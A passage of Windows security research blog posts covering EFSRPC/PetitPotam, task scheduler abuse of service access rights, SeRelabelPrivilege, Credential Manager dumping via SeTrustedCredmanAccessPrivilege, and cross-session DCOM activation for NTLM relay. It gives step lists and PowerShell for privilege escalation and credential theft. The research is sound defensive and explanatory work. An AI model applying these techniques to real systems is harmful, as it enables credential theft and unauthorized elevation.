    Basically unless the AllowOpenRawDL registry value is set to one then the call is blocked entirely regardless of the authenticating client. This seems to be a perfectly valid fix, except that EfsRpcOpenFileRaw isn't the only function usable to start an NTLM authentication session. As pointed out by Lee Christensen you can also do it via EfsRpcEncryptFileSrv or EfsRpcQueryUsersOnFile or others. Therefore as no other changes were put in place these other functions are accessible just as unauthenticated as the original.

    It's really unclear how Microsoft didn't see this, but I guess they might have been blinded by them actually fixing something which they were adamant was a configuration issue that sysadmins had to deal with. 

    UPDATE 2021/08/17: It's worth noting that while you can access the other functions unauthenticated it seems any network access is done using the "authenticated" caller, i.e. the ANONYMOUS user so it's probably not that useful. The point of this blog is not about abusing EFSRPC but why it's abusable :-)

    Anyway I hope that explains why PetitPotam works unauthenticated (props to topotam77 for the find) and might give you some insight into how you can determine what RPC servers might be accessible going forward. 

    A Little More on the Task Scheduler's Service Account Usage

    By: tiraniddo
    12 June 2021 at 05:42

    Recently I was playing around with a service which was running under a full virtual service account rather than LOCAL SERVICE or NETWORK SERVICE, but it had SeImpersonatePrivilege removed. Looking for a solution I recalled that Andrea Pierini had posted a blog about using virtual service accounts, so I thought I'd look there for inspiration. One thing which was interesting is that he mentioned that a technique abusing the task scheduler found by Clément Labro, which worked for LS or NS, didn't work when using virtual service accounts. I thought I should investigate it further, out of curiosity, and in the process I found an sneaky technique you can use for other purposes.

    I've already blogged about the task scheduler's use of service accounts. Specifically in a previous blog post I discussed how you could get the TrustedInstaller group by running a scheduled task using the service SID. As the service SID is the same name as used when you are using a virtual service account it's clear that the problem lies in the way in this functionality is implemented and that it's likely distinct from how LS or NS token's are created.

    The core process creation code for the task scheduler in Windows 10 is actually in the Unified Background Process Manager (UBPM) DLL, rather than in the task scheduler itself. A quick look at that DLL we find the following code:

    HANDLE UbpmpTokenGetNonInteractiveToken(PSID PrincipalSid) {

      // ...

      if (UbpmUtilsIsServiceSid(PrinicpalSid)) {

        return UbpmpTokenGetServiceAccountToken(PrinicpalSid);

      }

      if (EqualSid(PrinicpalSid, kNetworkService)) {

        Domain = L"NT AUTHORITY";

        User = L"NetworkService";

      } else if (EqualSid(PrinicpalSid, kLocalService)) {

        Domain = L"NT AUTHORITY";

        User = L"LocalService";

      }

      HANDLE Token;

      if (LogonUserExExW(User, Domain, Password, 

        LOGON32_LOGON_SERVICE, 

        LOGON32_PROVIDER_DEFAULT, &Token)) {

        return Token;

      }

      // ...

    }


    This UbpmpTokenGetNonInteractiveToken function is taking the principal SID from the task registration or passed to RunEx and determining what it represents to get back the token. It checks if the SID is a service SID, by which is means the NT SERVICE\NAME SID we used in the previous blog post. If it is it calls a separate function, UbpmpTokenGetServiceAccountToken to get the service token.

    Otherwise if the SID is NS or LS then it specifies the well know names for those SIDs and called LogonUserExEx with the LOGON32_LOGON_SERVICE type. The UbpmpTokenGetServiceAccountToken function does the following:

    TOKEN UbpmpTokenGetServiceAccountToken(PSID PrincipalSid) {

      LPCWSTR Name = UbpmUtilsGetAccountNamesFromSid(PrincipalSid);

      SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

      SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);

      HANDLE Token;

      GetServiceProcessToken(g_ScheduleServiceHandle, service, &Token);

      return Token;

    }

    This function gets the name from the service SID, which is the name of the service itself and opens it for all access rights (SERVICE_ALL_ACCESS). If that succeeds then it passes the service handle to an undocumented SCM API, GetServiceProcessToken, which returns the token for the service. Looking at the implementation in SCM this basically uses the exact same code as it would use for creating the token for starting the service. 

    This is why there's a distinction between LS/NS and a virtual service account using Clément's technique. If you use LS/NS the task scheduler gets a fresh token from the LSA with no regards to how the service is configured. Therefore the new token has SeImpersonatePrivilege (or what ever else is allowed). However for a virtual service account the service asks the SCM for the service's token, as the SCM knows about what restrictions are in place it honours things like privileges or the SID type. Therefore the returned token will be stripped of SeImpersonatePrivilege again even though it'll technically be a different token to the currently running service.

    Why does the task scheduler need some undocumented function to get the service token? As I mentioned in a previous blog post about virtual accounts only the SCM (well technically the first process to claim it's the SCM) is allowed to authenticate a token with a virtual service account. This seems kind of pointless if you ask me as you already need SeTcbPrivilege to create the service token, but it is what it is.

    Okay, so now we know why Clément's technique doesn't get you back any privileges. You might now be asking, so what? Well one interesting behavior came from looking at how the task scheduler determines if you're allowed to specify a service SID as a principal. In my blog post of creating a task running as TrustedInstaller I implied it needed administrator access, which is sort of true and sort of not. Let's see the function the task scheduler uses to determine if the caller's allowed to run a task as a specified principal.

    BOOL IsPrincipalAllowed(User& principal) {

      RpcAutoImpersonate::RpcAutoImpersonate();

      User caller;

      User::FromImpersonationToken(&caller);

      RpcRevertToSelf();

      if (tsched::IsUserAdmin(caller) || 

          caller.IsLocalSystem(caller)) {

        return TRUE;

      }

      

      if (principal == caller) {

        return TRUE;

      }


      if (principal.IsServiceSid()) {

        LPCWSTR Name = principal.GetAccount();

        RpcAutoImpersonate::RpcAutoImpersonate();

        SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

        SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);

        RpcRevertToSelf();

        if (service) {

          return TRUE;

        }

      }

      return FALSE;

    }

    The IsPrincipalAllowed function first checks if the caller is an administrator or SYSTEM. If it is then any principal is allowed (again not completely true, but good enough). Next it checks if the principal's user SID matches the one we're setting. This is what would allow NS/LS or a virtual service account to specify a task running as their own user account. 


    Finally, if the principal is a service SID, then it tries to open the service for full access while impersonating the caller. If that succeeds it allows the service SID to be used as a principal. This behaviour is interesting as it allows for a sneaky way to abuse badly configured services. 


    It's a well known check for privilege escalation that you enumerate all local services and see if any of them grant a normal user privileged access rights, mainly SERVICE_CHANGE_CONFIG. This is enough to hijack the service and get arbitrary code running as the service account. A common trick is to change the executable path and restart the service, but this isn't great for a few different reasons.

    1. Changing the executable path could easily be noticed.
    2. You probably want to fix the path back again afterwards, which is just a pain.
    3. If the service is currently running you'll need stop the service, then restart the modified service to get the code execution.
    However, as long as your account is granted full access to the service you can use the task scheduler even without being an administrator to get code running as the service's user account, such as SYSTEM, without ever needing to modify the service's configuration directly or stop/start the service. Much more sneaky. Of course this does mean that the token the task runs under might have privileges stripped etc, but that's something which is easy enough to deal with (as long as it's not write restricted).

    This is a good lesson on how to never take things on face value. I just assumed the caller would need administrator privileges to set the service account as the principal for a task. But it seems that's not actually required if you dig into the code. Hopefully someone will find it useful.

    Footnote: If you read this far, you might also ask, can you get back SeImpersonatePrivilege from a virtual service account or not? Of course, you just use the named pipe trick I described in a previous blog post. Because of the way that the token is created the token stored in the logon session will still have all the assigned privileges. You can extract the token by using the named pipe to your own service, and use that to create a new process and get back all the missing privileges.






    The Much Misunderstood SeRelabelPrivilege

    By: tiraniddo
    2 June 2021 at 21:49

    Based on my previous blog post I recently had a conversation with a friend and well-known Windows security researcher about token privileges. Specifically, I was musing on how SeTrustedCredmanAccessPrivilege is not a "God" privilege. After some back and forth it seemed we were talking at cross purposes. My concept of a "God" privilege is one which the kernel considers to make a token elevated (see Reading Your Way Around UAC (Part 3)) and so doesn't make it available to any token with an integrity level less than High. They on the other hand consider such a privilege to be one where you can directly compromise a resource or the OS as a whole by having the privilege enabled, this might include privileges which aren't strictly a "God" from the kernel's perspective but can still allow system compromise.

    After realizing the misunderstanding I was still surprised that one of the privileges in their list wasn't considering a "God", specifically SeRelabelPrivilege. It seems that there's perhaps some confusion as to what this privilege actually allows you to do, so I thought it'd be worth clearing it up.

    Point of pedantry: I don't believe it's correct to say that a resource has an integrity level. It instead has a mandatory label, which is stored in an ACE in the SACL. That ACE contains a SID which maps to an integrity level and an mandatory policy which is stored in the access mask. The combination of integrity level and policy is what determines what access is granted (although you can't grant write up through the policy). The token on the other hand does have an integrity level and a separate mandatory policy, which isn't the same as the one in the ACE. Oddly you specify the value when calling SetTokenInformation using a TOKEN_MANDATORY_LABEL structure, confusing I know.

    As with a lot of privileges which don't get used very often the official documentation is not great. You can find the MSDN documentation here. The page is worse than usual as it seems to have been written at a time in the Vista/Longhorn development when the Mandatory Integrity Control (MIC) (or as it calls it Windows Integrity Control (WIC)) feature was still in flux. For example, it mentions an integrity level above System, called Installer. Presumably Installer was the initial idea to block administrators modifying system files, which was replaced by the TrustedInstaller SID as the owner (see previous blog posts). There is a level above System in Vista, called Protected Process, which is not usable as protected processes was implementing using a different mechanism. 

    Distilling what the documentation says the privilege does, it allows for two operations. First it allows you to set the integrity level in a mandatory label ACE to be above the caller's token integrity level. Normally as long as you've been granted WRITE_OWNER access to a resource you can set the label's integrity level to any value less than or equal to the caller's integrity level.

    For example, if you try to set the resource's label to System, but the caller is only at High then the operation fails with the STATUS_INVALID_LABEL error. If you enable SeRelabelPrivilege then you can set this operation will succeed. 

    Note, the privilege doesn't allow you to raise the integrity level of a token, you need SeTcbPrivilege for that. You can't even raise the integrity level to be less than or equal to the caller's integrity level, the operation can only decrease the level in the token without SeTcbPrivilege.

    The second operation is that you can decrease the label. In general you can always decrease the label without the privilege, unless the resource's label is above the callers. For example you can set the label to Low without any special privilege, as long as you have WRITE_OWNER access on the handle and the current label is less than or equal to the caller's. However, if the label is System and the caller is High then they can't decrease the label and the privilege is required.

    The documentation has this to say (emphasis mine):

    "If malicious software is set with an elevated integrity level such as Trusted Installer or System, administrator accounts do not have sufficient integrity levels to delete the program from the system. In that case, use of the Modify an object label right is mandated so that the object can be relabeled. However, the relabeling must occur by using a process that is at the same or a higher level of integrity than the object that you are attempting to relabel."

    This is a very confused paragraph. First it indicates that an administrator can't delete resource with Trusted Installer or System integrity labels and so requires the privilege to relabel. And then it says that the process doing the relabeling must be at a greater or equal integrity level to do the relabeling. Which if that is the case you don't need the privilege. Perhaps the original design on mandatory labels was more sticky, as in maybe you always needed SeRelabelPrivilege to reduce the label regardless of its current value?

    At any rate the only user that gets SeRelabelPrivilege by default is SYSTEM, which defaults to the System integrity level which is already the maximum allowed level so this behavior of the privilege seems pretty much moot. At any rate as it's a "God" privilege it will be disabled if the token has an integrity level less than High, so this lowering operation is going to be rarely useful.

    This leads in to the most misunderstood part which if you squint you might be able to grasp from the privilege's documentation. The ability to lower the label of a resource is mostly dependent on whether the caller can get WRITE_OWNER access to the resource. However, the WRITE_OWNER access right is typically part of GENERIC_ALL in the generic mapping, which means it will never be granted to a caller with a lower integrity level regardless of the DACL or whether they're the owner. 

    This is the interesting thing the privilege brings to the lowering operation, it allows the caller to circumvent the MIC check for WRITE_OWNER. This then allows the caller to open for WRITE_OWNER a higher labeled resource and then change the label to any level it likes. This works the same way as SeTakeOwnershipPrivilege, in that it grants WRITE_OWNER without ever checking the DACL. However, if you use SeTakeOwnershipPrivilege it'll still be subject to the MIC check and will not grant access if the label is above the caller's integrity level.

    The problem with this privilege is down to the design of MIC, specifically that WRITE_OWNER is overloaded to allow setting the resource's mandatory label but also its traditional use of setting the owner. There's no way for the kernel to distinguish between the two operations once the access has been granted (or at least it doesn't try to distinguish). 

    Surely, there is some limitation on what type of resource can be granted WRITE_OWNER access? Nope, it seems that even if the caller does not have any access rights to the resource it will still be granted WRITE_OWNER access. This makes the SeRelabelPrivilege exactly like SeTakeOwnershipPrivilege but with the adding feature of circumventing the MIC check. Summarizing, a token with SeRelabelPrivilege enabled can take ownership of any resource it likes, even one which has a higher label than the caller.

    You can of course verify this yourself, here's some PowerShell script using NtObjectManager which you should run as an administrator. The script creates a security descriptor which doesn't grant SYSTEM any access, then tries to request WRITE_OWNER without and with SeRelabelPrivilege.

    PS> $sd = New-NtSecurityDescriptor "O:ANG:AND:(A;;GA;;;AN)" -Type Directory
    PS> Invoke-NtToken -System {
       Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
    }
    Status               Granted Access Privileges
    ------               -------------- ----------
    STATUS_ACCESS_DENIED 0              NONE

    PS> Invoke-NtToken -System {
       Enable-NtTokenPrivilege SeRelabelPrivilege
       Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
    }
    Status         Granted Access Privileges
    ------         -------------- ----------
    STATUS_SUCCESS WriteOwner     SeRelabelPrivilege

    The fact that this behavior is never made explicit is probably why my friend didn't realize its behavior before. This coupled with the privilege's rare usage, only being granted by default to SYSTEM means it's not really a problem in any meaningful sense. It would be interesting to know the design choices which led to the privilege being created, it seems like its role was significantly more important at some point and became almost vestigial during the Vista development process. 

    If you've read this far is there any actual useful scenario for this privilege? The only resources which typically have elevated labels are processes and threads. You can already circumvent the MIC check using SeDebugPrivilege. Of course usage of that privilege is probably watched like a hawk, so you could abuse this privilege to get full access to an elevated process, by accessing changing the owner to the caller and lowering the label. Once you're the owner with a low label you can then modify the DACL to grant full access directly without SeDebugPrivilege.

    However, as only SYSTEM gets the privilege by default you'd need to impersonate the token, which would probably just allow you to access the process anyway. So mostly it's mostly a useless quirk unless the system you're looking at has granted it to the service accounts which might then open the door slightly to escaping to SYSTEM.

    Dumping Stored Credentials with SeTrustedCredmanAccessPrivilege

    By: tiraniddo
    21 May 2021 at 07:03

    I've been going through the various token privileges on Windows trying to find where they're used. One which looked interesting is SeTrustedCredmanAccessPrivilege which is documented as "Access Credential Manager as a trusted caller". The Credential Manager allows a user to store credentials, such as web or domain accounts in a central location that only they can access. It's protected using DPAPI so in theory it's only accessible when the user has authenticated to the system. The question is, what does having SeTrustedCredmanAccessPrivilege grant? I couldn't immediately find anyone who'd bothered to document it, so I guess I'll have to do it myself.

    The Credential Manager is one of those features that probably sounded great in the design stage, but does introduce security risks, especially if it's used to store privileged domain credentials, such as for remote desktop access. An application, such as the remote desktop client, can store domain credential using the CredWrite API and specifying the username and password in the CREDENTIAL structure. The type of credentials should be set to CRED_TYPE_DOMAIN_PASSWORD.

    An application can then access the stored credentials for the current user using APIs such as CredRead or CredEnumerate. However, if the type of credential is CRED_TYPE_DOMAIN_PASSWORD the CredentialBlob field which should contain the password is always empty. This is an artificial restriction put in place by LSASS which implements the credential manager RPC service. If a domain credentials type is being read then it will never return the password.

    How does the domain credentials get used if you can't read the password? Security packages such as NTLM/Kerberos/TSSSP which are running within the LSASS process can use an internal API which doesn't restrict the reading of the domain password. Therefore, when you authenticate to the remote desktop service the target name is used to lookup available credentials, if they exist the user will be automatically authenticated.

    The credentials are stored in files in the user's profile encrypted with the user's DPAPI key. Why can we not just decrypt the file directly to get the password? When writing the file LSASS sets a system flag in the encrypted blob which makes the DPAPI refuse to decrypt the blob even though it's still under a user's key. Only code running in LSASS can call the DPAPI to decrypt the blob.

    If we have administrator privileges getting access the password is trivial. Read the Mimikatz wiki page to understand the various ways that you can use the tool to get access to the credentials. However, it boils down to one of the following approaches:

    1. Patch out the checks in LSASS to not blank the password when read from a normal user.
    2. Inject code into LSASS to decrypt the file or read the credentials.
    3. Just read them from LSASS's memory.
    4. Reimplement DPAPI with knowledge of the user's password to ignore the system flag.
    5. Play games with the domain key backup protocol.
    For example, Nirsoft's CredentialsFileView seems to use the injection into LSASS technique to decrypt the DPAPI protected credential files. (Caveat, I've only looked at v1.07 as v1.10 seems to not be available for download anymore, so maybe it's now different. UPDATE: it seems available for download again but Defender thinks it's malware, plus ça change).

    At this point you can probably guess that SeTrustedCredmanAccessPrivilege allows a caller to get access to a user's credentials. But how exactly? Looking at LSASRV.DLL which contains the implementation of the Credential Manager the privilege is checked in the function CredpIsRpcClientTrusted. This is only called by two APIs, CredrReadByTokenHandle and CredrBackupCredentials which are exported through the CredReadByTokenHandle and CredBackupCredentials APIs.

    The CredReadByTokenHandle API isn't that interesting, it's basically CredRead but allows the user to read from to be specified by providing the user's token. As far as I can tell reading a domain credential still returns a blank password. CredBackupCredentials on the other hand is interesting. It's the API used by CREDWIZ.EXE to backup a user's credentials, which can then be restored at a later time. This backup includes all credentials including domain credentials. The prototype for the API is as follows:

    BOOL WINAPI CredBackupCredentials(HANDLE Token, 
                                      LPCWSTR Path, 
                                      PVOID Password, 
                                      DWORD PasswordSize, 
                                      DWORD Flags);

    The backup process is slightly convoluted, first you run CREDWIZ on your desktop and select backup and specify the file you want to write the backup to. When you continue with the backup the process makes an RPC call to your WinLogon process with the credentials path which spawns a new copy of CREDWIZ on the secure desktop. At this point you're instructed to use CTRL+ALT+DEL to switch to the secure desktop. Here you type the password, which is used to encrypt the file to protect it at rest, and is needed when the credentials are restored. CREDWIZ will even ensure it meets your system's password policy for complexity, how generous.

    CREDWIZ first stores the file to a temporary file, as LSASS encrypts the encrypted contents with the system DPAPI key. The file can be decrypted then written to the final destination, with appropriate impersonation etc.

    The only requirement for calling this API is having the SeTrustedCredmanAccessPrivilege privilege enabled. Assuming we're an administrator getting this privilege is easy as we can just borrow a token from another process. For example, checking for what processes have the privilege shows obviously WinLogon but also LSASS itself even though it arguably doesn't need it.

    PS> $ts = Get-AccessibleToken
    PS> $ts | ? { 
       "SeTrustedCredmanAccessPrivilege" -in $_.ProcessTokenInfo.Privileges.Name 
    }
    TokenId Access                                  Name
    ------- ------                                  ----
    1A41253 GenericExecute|GenericRead    LsaIso.exe:124
    1A41253 GenericExecute|GenericRead     lsass.exe:672
    1A41253 GenericExecute|GenericRead winlogon.exe:1052
    1A41253 GenericExecute|GenericRead atieclxx.exe:4364

    I've literally no idea what the ATIECLXX.EXE process is doing with SeTrustedCredmanAccessPrivilege, it's probably best not to ask ;-)

    To use this API to backup a user's credentials as an administrator you do the following. 
    1. Open a WinLogon process for PROCESS_QUERY_LIMITED_INFORMATION access and get a handle to its token with TOKEN_DUPLICATE access.
    2. Duplicate token into an impersonation token, then enable SeTrustedCredmanAccessPrivilege.
    3. Open a token to the target user, who must already be authenticated.
    4. Call CredBackupCredentials while impersonating the WinLogon token passing a path to write to and a NULL password to disable the user encryption (just to make life easier). It's CREDWIZ which enforces the password policy not the API.
    5. While still impersonating open the file and decrypt it using the CryptUnprotectData API, write back out the decrypted data.
    If it all goes well you'll have all the of the user's credentials in a packed binary format. I couldn't immediately find anyone documenting it, but people obviously have done before. I'll leave doing all this yourself as a exercise for the reader. I don't feel like providing an implementation.


    Why would you do this when there already exists plenty of other options? The main advantage, if you can call it that, it you never touch LSASS and definitely never inject any code into it. This wouldn't be possible anyway if LSASS is running as PPL. You also don't need to access the SECURITY hive to extract DPAPI credentials or know the user's password (assuming they're authenticated of course). About the only slightly suspicious thing is opening WinLogon to get a token, though there might be alternative approaches to get a suitable token.



    Standard Activating Yourself to Greatness

    By: tiraniddo
    27 April 2021 at 23:45

    This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. This relied on the fact that if you're in logged in as a user on session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage the DCOM activator would create the object on the lowest interactive session rather than the session 0. Once an object is created the initial unmarshal of the IStorage object would happen in the context of the user authenticated to that session. If that happens to be a privileged user such as a Domain Administrator then the NTLM authentication could be relayed to a remote server and fun ensues.

    The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

    Of course this already exists, you can use the session moniker to activate an object cross-session (other than to session 0 which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeated told Microsoft they need to fix this activation route as it makes no sense than a non-administrator can do it. But my warnings have not been heeded. 

    If you read the description of the session moniker you might notice a problem for us, it can't be combined with IStorage activation. The COM APIs only give us one or the other. However, if you poke around at the DCOM protocol documentation you'll notice that they are technically independent. The session activation is specified by setting the dwSessionId field in the SpecialPropertiesData activation property. And the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

    The problem with testing this out is implementing DCOM activation is ugly. The activation properties first need to be NDR marshalled in a blob. They then need to be packaged up correctly before it can be sent to the activator. Also the documentation is only for remote activation which is not we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

    No, sorry. There is an undocumented way though if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to just look at how the system already does it. Specifically we can look at how session moniker is activating the object and maybe from that we'll be lucky and we can reuse that for our own purposes.

    Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to create parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality which we don't care about. We'll just start at the MkParseDisplayName which is in OLE32.

    HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName, 
          ULONG *pchEaten, LPMONIKER *ppmk) {
      HRESULT hr = FindLUAMoniker(pbc, szUserName, &pcchEaten, &ppmk);
      if (hr == MK_E_UNAVAILABLE) {
        hr = FindSessionMoniker(pbc, szUserName, &pcchEaten, &ppmk);
      }
      // Parse rest of moniker.
    }

    Almost immediately we see a call to FindSessionMoniker, seems promising. Looking into that function we find what we need.

    HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName, 
                               ULONG *pchEaten, LPMONIKER *ppmk) {
      DWORD dwSessionId = 0;
      BOOL bConsole = FALSE;
      
      if (wcsnicmp(pszDisplayName, L"Session:", 8))
        return MK_E_UNAVAILABLE;
      
      
    if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
        dwConsole = TRUE;
        *pcbEaten = 15;
      } else {
        LPWSTR EndPtr;
        dwSessionId = wcstoul(pszDisplayName + 8, &End, 0);
        *pcbEaten = EndPtr - pszDisplayName;
      }

      *ppmk = new CSessionMoniker(dwSessionId, bConsole);
      return S_OK;
    }

    This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this is not doing any activation yet. You don't use the session moniker in isolation, instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:

    Session:3!clsid:0002DF02-0000-0000-C000-000000000046

    The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046 which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right most moniker, which is the class moniker.

    HRESULT CClassMoniker::BindToObject(LPBC pbc, 
      LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
      if (pmkToLeft) {
          IClassActivator pClassActivator;
          pmkToLeft->BindToObject(pcb, nullptr, 
            IID_IClassActivator, &pClassActivator);
          return pClassActivator->GetClassObject(m_clsid, 
                CLSCTX_SERVER, 0, riid, ppv);

      }
      // ...
    }

    The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

    HRESULT CSessionMoniker::GetClassObject(
       REFCLSID pClassID, CLSCTX dwClsContext, 
       LCID locale, REFIID riid, void **ppv) {
      IStandardActivator* pActivator;
      CoCreateInstance(&CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, 
        IID_IStandardActivator, &pActivator);

     
      ISpecialSystemProperties pSpecialProperties;
      pActivator->QueryInterface(IID_ISpecialSystemProperties, 
          &pSpecialProperties);
      pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
      return pActivator->StandardGetClassObject(pClassId, dwClsContext, 
                                                NULL, riid, ppv);

    }

    Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state. It then calls the StandardGetClassObject method on the IStandardActivator and you should now have a COM server cross-session. None of these interface or the class are officially documented of course (AFAIK).

    The $1000 question is, can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE for the implementation of the interface you find one of its functions is:

    HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
      REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
      IStorage* pstg, int dwCount, MULTI_QI pResults[]);

    It seems that the answer is yes. Of course it's possible that you still can't mix the two things up. That's why I wrote a quick and dirty example in C#, which is available here. Seems to work fine. Of course I've not tested it out with the actual vulnerability to see it works in that scenario. That's something for others to do.

    Creating your own Virtual Service Accounts

    By: tiraniddo
    26 October 2020 at 23:54

    Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts

    A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with password.

    To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

    The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

    So let's create out own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

    SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
    SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

    So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can login the account you need to grant it a logon right. This is normally SeServiceLogonRight if you wanted a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

    If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

    PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

    Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

    PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
    PS> Format-NtToken $token
    AWESOME DOMAIN\USER

    As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want document these features even though it could be a useful thing for normal developers.



    Using LsaManageSidNameMapping to add a name to a SID.

    By: tiraniddo
    24 October 2020 at 23:23

    I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

    LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

    and

    LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

    They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

    This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

    1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
    2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
    3. You must register a domain SID's name first to use the SID which includes it.
    Basically 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15) and we can't just go straight to added the SID to name as we need to have registered the domain with the API, it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

    Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


    Generating NDR Type Serializers for C#

    By: tiraniddo
    1 July 2020 at 21:32
    As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

    I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializer.

    First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

    To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

    interface TypeEncoders
    {
        typedef struct _TEST_TYPE
        {
            [unique, string] wchar_t* Name;
            DWORD Value;
        } TEST_TYPE;
    }

    You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

    interface TypeEncoders
    {
        typedef [encode, decode] TEST_TYPE;
    }

    Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

    If you look at the Decode function when compiled for a X64 target it should look like the following:

    void
    TEST_TYPE_Decode(
        handle_t _MidlEsHandle,
        TEST_TYPE * _pType)
